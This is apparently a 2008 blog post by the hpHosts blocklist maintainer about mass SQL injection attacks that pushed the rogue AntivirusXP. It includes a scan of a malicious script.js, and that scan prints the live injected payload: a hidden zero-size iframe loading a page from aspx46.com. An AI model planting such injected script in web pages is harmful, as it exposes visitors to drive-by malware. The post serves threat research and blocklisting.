Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 8 September 2008

SQL Exploitified!

I've been seeing these for some time now (indeed, I've been seeing attempts at exploiting the hpHosts server since atleast May), and figured I'd collate a list of those known to have been around, both old and new.

See the following for the results of those that were live/dead as of a few mins ago (note that there's been thousands of these domains since the attacks against everyone began, the list doesn't include them all as not all of them have been documented (or if they were, I couldn't locate them));

http://hosts-file.net/misc/SQL_Injection_Attacks.html

Some of the domains were found courtesy of the fantastic list at;

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

I had planned to do a write-up on how the exploit was attempted, but Michael (Bloombit) has done a much more detailed job than I had planned, so I'll leave that to him.

Connie also submitted one of these for inclusion in hpHosts toward the end of August, and further analysis saw the domain being led to, changing from time to time, before it finally pointed back to itself;

http://forum.hosts-file.net/viewtopic.php?p=4945#p4945

In all cases however, both old and new, the final result was the exploit attempting
to peddle the now well known rogue, AntivirusXP. See the following for an example;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.19ssl.net/script.js
Server IP: 84.157.239.55 [ p549DEF37.dip.t-dialin.net ]
        > 12.202.254.90 [ 12-202-254-90.client.mchsi.com ]
        > 76.104.72.250 [ c-76-104-72-250.hsd1.va.comcast.net ]
        > 24.1.175.116 [ c-24-1-175-116.hsd1.il.comcast.net ]
        > 200.165.57.31 [ Resolution failed ]
        > 75.49.217.223 [ adsl-75-49-217-223.dsl.emhril.sbcglobal.net ]
        > 121.170.44.90 [ Resolution failed ]
        > 87.116.180.136 [ cable-87-116-180-136.dynamic.sbb.rs ]
        > 69.37.33.66 [ JERRY_DESK ]
        > 71.193.25.70 [ c-71-193-25-70.hsd1.ca.comcast.net ]
        > 76.170.105.146 [ cpe-76-170-105-146.socal.res.rr.com ]
        > 70.218.74.127 [ 127.sub-70-218-74.myvzw.com ]
        > 68.80.34.22 [ c-68-80-34-22.hsd1.pa.comcast.net ]
        > 12.203.121.61 [ 12-203-121-61.client.mchsi.com ]
        > 79.179.170.191 [ bzq-79-179-170-191.red.bezeqint.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
Date: 08 September 2008
Time: 23:16:15:16
*****************************************************************
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}


vURL Online:
http://vurl.mysteryfcm.co.uk/?url=http://www.19ssl.net/script.js&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on

... and not surprisingly, almost all of the newer one's I've spotted, have used fastflux. Oh and nope, the "NESCO Accounting and Finance" displayed on all of the resulting sites homepages, isn't real either ;o)

No comments: